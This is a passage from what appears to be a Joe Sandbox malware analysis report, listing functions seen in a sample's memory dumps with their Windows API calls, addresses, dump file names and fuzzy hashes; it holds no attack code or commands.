                                • Opcode Fuzzy Hash: fdca472e9d85883ef0f3ee81d57c698baa58f593e086b5814675c7f797b6a49f
                                • Instruction Fuzzy Hash: CE01B172A11229AFDF159FA1EC06AEF3B64EF50354F50402AF8019A290DB78DE10DB98
                                Function 003F5300 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 003F5349
                                Strings
                                • failed to initialize COM, xrefs: 003F5387
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID: failed to initialize COM
                                • API String ID: 2882836952-2564502714
                                • Opcode ID: be014e44686837f00f207084543a6a5a42e9c440994d500084b1d65ca1e78e7c
                                • Instruction ID: a966bb1af97e7207b697c4f09622a3d16934273a70ee986f2a7afe9d0b72199c
                                • Opcode Fuzzy Hash: be014e44686837f00f207084543a6a5a42e9c440994d500084b1d65ca1e78e7c
                                • Instruction Fuzzy Hash: 8C210275900208AFCB01EF98C945F69BBB8FF08710F24416AFA10C7291EBB5A814CBA1
                                Function 004064D0 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                • GetFinalPathNameByHandleW.KERNEL32(00000000,?,?,00000000), ref: 00406527
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040656A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorFinalHandleLastNamePath
                                • String ID:
                                • API String ID: 914413544-0
                                • Opcode ID: 89c806a1c2dbc7a5adafd437ff59790331d6d3d57cb1cd15554a0c31cf046b30
                                • Instruction ID: 2ce03a0ceeaf2440e8e81bd5b7624d76750b5410b021d7ad652d03edc10708fe
                                • Opcode Fuzzy Hash: 89c806a1c2dbc7a5adafd437ff59790331d6d3d57cb1cd15554a0c31cf046b30
                                • Instruction Fuzzy Hash: 04415B74A002099FCB04DF98D994BAEBBF5BF49304F15806EE906B7390D775A901CFA5
                                Function 0042DCC4 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00458FD0,0000000C), ref: 0042DCD7
                                • RtlExitUserThread.NTDLL(00000000), ref: 0042DCDE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorExitLastThreadUser
                                • String ID:
                                • API String ID: 1750398979-0
                                • Opcode ID: 0bc6fd9b3738cf55f0eb914e208f0773397058de1e429994022a5bca303140f2
                                • Instruction ID: fa36a96a07579721d792e5b217d53c3b9d6bc249593a5ffb51bc62106c2e455a
                                • Opcode Fuzzy Hash: 0bc6fd9b3738cf55f0eb914e208f0773397058de1e429994022a5bca303140f2
                                • Instruction Fuzzy Hash: E3F0C275A00215AFDB04BFB1E80AA2E3B75FF49701F54045FF5019B2A2DB785901CBA9
                                Function 06300D51 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 06300FAE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 80ced3dd83278dbfb61ba7da6a8e957947b9270355f7ee25d246f869f1983676
                                • Instruction ID: 4f8cba9445834f9a73b5a64437d36bd4cb4c017764d78cc91aeee07e745a0dd1
                                • Opcode Fuzzy Hash: 80ced3dd83278dbfb61ba7da6a8e957947b9270355f7ee25d246f869f1983676
                                • Instruction Fuzzy Hash: 2B815770A00B058FE7A8DF29D45479ABBF5FF88204F00892DD49AD7B90DB74E849CB91
                                Function 003EA050 Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                Download Yara Rule
                                APIs
                                • __Mtx_init_in_situ.LIBCPMT ref: 003EA18A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Mtx_init_in_situ
                                • String ID:
                                • API String ID: 3366076730-0
                                • Opcode ID: b3ac933dd2293bfc3ce1a7abce065ac5ae763f79fbe0ce7589e017f8da27cc02
                                • Instruction ID: 152de22e5cd3e4b7c6118e26adff72de73274269a0c6a20fd26caeada3caadc2
                                • Opcode Fuzzy Hash: b3ac933dd2293bfc3ce1a7abce065ac5ae763f79fbe0ce7589e017f8da27cc02
                                • Instruction Fuzzy Hash: 41616AB090074A9FE714DF55C84579AFBF0FF45308F14825EE5086B282E7BAA588CBD5
                                Function 0040A000 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00424CBF: RtlAcquireSRWLockExclusive.NTDLL(?), ref: 00424CC5
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040A05C
                                  • Part of subcall function 00424CF7: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0040A088), ref: 00424D01
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AcquireExclusiveHandleInfoLockModuleNativeSystem
                                • String ID:
                                • API String ID: 2396907284-0
                                • Opcode ID: cd8a77f870ad0100b3d33b9242dad80969f2572b997192e0434f46d0d7e7c2d4
                                • Instruction ID: 4eb1054d346a52ca6f5515c947e77427b76602b0bf76102f6702049501ad661b
                                • Opcode Fuzzy Hash: cd8a77f870ad0100b3d33b9242dad80969f2572b997192e0434f46d0d7e7c2d4
                                • Instruction Fuzzy Hash: 4941A1B1E002198FCF14DF69D885AEEB7B4EF48314F14053AE915BB381EB386914CB96
                                Function 06302F30 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06303042
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: b997773d4bab37a79afce630c2513ae074c1f9ba4867644001bb1366a763a6b7
                                • Instruction ID: 51b09446ad57a0ac32003e5ad4f7dd5f8f6b8c3cc7314aedc2d9aa4942148c72
                                • Opcode Fuzzy Hash: b997773d4bab37a79afce630c2513ae074c1f9ba4867644001bb1366a763a6b7
                                • Instruction Fuzzy Hash: 5A41B0B1D103099FEB14CF9AC894ADEBBB5BF48310F24812AE819AB250D775A945CF90
                                Function 06300414 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06305741
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 07c4f9938a7f52bb7c4c0f7bda1b1f890aaa0e71f64926b359a83b98d17cdffa
                                • Instruction ID: d8de8691b55c51537ac3a226c8cff9b64c5e222367de37c58a153d7d68d612ab
                                • Opcode Fuzzy Hash: 07c4f9938a7f52bb7c4c0f7bda1b1f890aaa0e71f64926b359a83b98d17cdffa
                                • Instruction Fuzzy Hash: EF413AB8900309CFDB54CF99C588BAABBF5FB88314F24C459D519AB361D774A845CFA0
                                Function 025B6984 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 025B8021
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3846304760.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_25b0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 3faffc73fcf6b6efbec57ce96dfc312f8d8786a8a6ac4e118a26712322db5393
                                • Instruction ID: 9c8ab84deaef80c94ae7b1d582e57c20deaf9bf811b3141a49fbad37f0712edb
                                • Opcode Fuzzy Hash: 3faffc73fcf6b6efbec57ce96dfc312f8d8786a8a6ac4e118a26712322db5393
                                • Instruction Fuzzy Hash: 3941CF70C0071DCBEB25CFA9C848BDEBBB5BF49304F20856AD408AB261DB756945CF94
                                Function 025B7F64 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 025B8021
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3846304760.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_25b0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 5f985ccec58869d7315e19dc66b28216e996fdb3bc6d3a25e9f6d509c7c601d0
                                • Instruction ID: ffaf8c80497fb23c40ded849b4ec17058c31e3d4a379fedd88ae77565700e31e
                                • Opcode Fuzzy Hash: 5f985ccec58869d7315e19dc66b28216e996fdb3bc6d3a25e9f6d509c7c601d0
                                • Instruction Fuzzy Hash: CA41BFB0C00719CBEB25CFA9C8887DEFBB5BF49304F20856AD408AB265DB756946CF51
                                Function 0632A3FA Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0632A487
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: d52dc4743c52ef5745af7e6b87d8403e99592a606593423d634d5ea69da83755
                                • Instruction ID: d7074a77f116b8ecaee890e9e3ffbb98f9678a9945126d5643a7cc9a3668daef
                                • Opcode Fuzzy Hash: d52dc4743c52ef5745af7e6b87d8403e99592a606593423d634d5ea69da83755
                                • Instruction Fuzzy Hash: FC21E4B5900309AFDB10CF9AD884BDEBBF4EB48310F14841AE958A7350D378A954CFA4
                                Function 0632A400 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0632A487
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: ae632afc12397a7e04b7b6df49de357ba77019d86e1982c57bdb8eb4229ba97c
                                • Instruction ID: b8c17f16988f26f295423dcfe1ce6f60d126e348a149a8b21dda7d771512cc13
                                • Opcode Fuzzy Hash: ae632afc12397a7e04b7b6df49de357ba77019d86e1982c57bdb8eb4229ba97c
                                • Instruction Fuzzy Hash: 1B21E4B59003099FDB10CF9AD884ADEBBF4EB48310F14841AE918A7350D374A954CFA0
                                Function 06300150 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06301029,00000800,00000000,00000000), ref: 0630121A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 038bdd5c61b8f914c48fb956356a1a2859d19dd639fc25a23096a2701a052aff
                                • Instruction ID: 66ec4ada8410ad7fd8b64bbbea0541d9a6b06caed3f808fab18b2a4f115dd541
                                • Opcode Fuzzy Hash: 038bdd5c61b8f914c48fb956356a1a2859d19dd639fc25a23096a2701a052aff
                                • Instruction Fuzzy Hash: 151103B6C003498FDB14CF9AD444BDEFBF8AB48310F10842AE519A7640C375A549CFA4
                                Function 063011A9 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06301029,00000800,00000000,00000000), ref: 0630121A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: e78744aaedef13b8c2d3d10a1aa1c9d389ced71dc696753a3686b5593f30ada2
                                • Instruction ID: 96acc353ac42cee0229d6b2a09471fc14b8bb6dbe489d0e76ae2936c884d5b3b
                                • Opcode Fuzzy Hash: e78744aaedef13b8c2d3d10a1aa1c9d389ced71dc696753a3686b5593f30ada2
                                • Instruction Fuzzy Hash: 4B1100B68002498FDB14CF9AC844BDEFBF8AB49310F14842AE419A7640C375A549CFA4
                                Function 06300F48 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 06300FAE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 35ee04132cd63338c62cd7cd3159122c82cd47827ad130d5efa6dbda39dd0737
                                • Instruction ID: 81235a7c9d2be7fb5d76ff1335ebdef0fec5074979eb8b069cc9709fd954eb39
                                • Opcode Fuzzy Hash: 35ee04132cd63338c62cd7cd3159122c82cd47827ad130d5efa6dbda39dd0737
                                • Instruction Fuzzy Hash: 411110B5C003498FDB14CF9AC444BDEFBF8AB88214F10842AD459A7740C379A549CFA5
                                Function 06308EE0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0630809F), ref: 06308F45
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DispatchMessage
                                • String ID:
                                • API String ID: 2061451462-0
                                • Opcode ID: 0db9069395429b96cff1e6f6a5be16f159bb1402b5fd32c987f98898310f1f54
                                • Instruction ID: 872e651a57b671b4b5118e4ab2b96819db210dda4377dbf6c68f2dd24d2d93a9
                                • Opcode Fuzzy Hash: 0db9069395429b96cff1e6f6a5be16f159bb1402b5fd32c987f98898310f1f54
                                • Instruction Fuzzy Hash: BF11FEB5C046498FDB20CF9AD448BDEFBF9AB48320F10856AE918A7750D378A544CFA5
                                Function 06306CC8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06307BB5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 4578f347054d4ad96efe68e6b747d219bc833b5d3f45087cdcbcec29db1c6fb6
                                • Instruction ID: 41912ce9ce024e92cb49340fb56504677949ba207cf4e78eb6bb0eadad3f64b3
                                • Opcode Fuzzy Hash: 4578f347054d4ad96efe68e6b747d219bc833b5d3f45087cdcbcec29db1c6fb6
                                • Instruction Fuzzy Hash: 651142B4800348CFDB20DF9AD489BDEBBF8EB48220F20845AD518A7740D378A944CFA4
                                Function 06306D74 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0630809F), ref: 06308F45
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DispatchMessage
                                • String ID:
                                • API String ID: 2061451462-0
                                • Opcode ID: cf94a390c4a9c1572b2cb9b080706caeff1f6d46f1a870928fb29d35b02fbde1
                                • Instruction ID: 3f234ef19cf71468e5af9252b7d2adbbdbd17f0bbcac81aa2b9eaad60cce97ea
                                • Opcode Fuzzy Hash: cf94a390c4a9c1572b2cb9b080706caeff1f6d46f1a870928fb29d35b02fbde1
                                • Instruction Fuzzy Hash: 9E112EB5C046488FDB20CF9AD448BDEFBF8EB48320F10846AE518A7750D378A508CFA5
                                Function 06307B58 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06307BB5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 623acbc88e341a5d8fe633261d64b6d9cc93d0266c72e2515638295be190d3b4
                                • Instruction ID: 23e55622860e89174e819491f04b6932a8d2dbedc8051210de2a10efd4efbb88
                                • Opcode Fuzzy Hash: 623acbc88e341a5d8fe633261d64b6d9cc93d0266c72e2515638295be190d3b4
                                • Instruction Fuzzy Hash: 4B1112B58003498FDB20CFAAD489BDEFBF4EB48324F20845AD558A7740D378A544CFA5
                                Function 00431398 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?), ref: 004313D9
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: c5f4a86e8a4d4392b3b07242df14a2361b1ecd91d25f74fb375eff19f6018c4c
                                • Instruction ID: 116d43c0027fab8f02176f6f339d49ec1ebfe4c425a1b28e09bb3723c004e037
                                • Opcode Fuzzy Hash: c5f4a86e8a4d4392b3b07242df14a2361b1ecd91d25f74fb375eff19f6018c4c
                                • Instruction Fuzzy Hash: 80F0E936604234A7FB211B73AC45B5B37489F49BA0F149127EC14E7AB0DABCDC0146ED
                                Function 003FB7E0 Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                Download Yara Rule
                                APIs
                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,A05DD77D), ref: 003FB830
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FormatMessage
                                • String ID:
                                • API String ID: 1306739567-0
                                • Opcode ID: cb7a35d3d07401d8c85e11f35a6dd87efa47410ea05a3aa82c3b545efc86bd0e
                                • Instruction ID: ed5448e6f11966e2b5cf9ce9704642e35aa85d8dbdf5f314436787a3123e9ba5
                                • Opcode Fuzzy Hash: cb7a35d3d07401d8c85e11f35a6dd87efa47410ea05a3aa82c3b545efc86bd0e
                                • Instruction Fuzzy Hash: 12F08176904208FBCB11CF94DC41F9BBBB8FB09720F20462AF911922D0D37555108B54
                                Function 0043023B Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0043026D
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: d8bde64b67a0e67c27e30316ac598e1c67297a40a5b27b132b0e94f48ce3e6a8
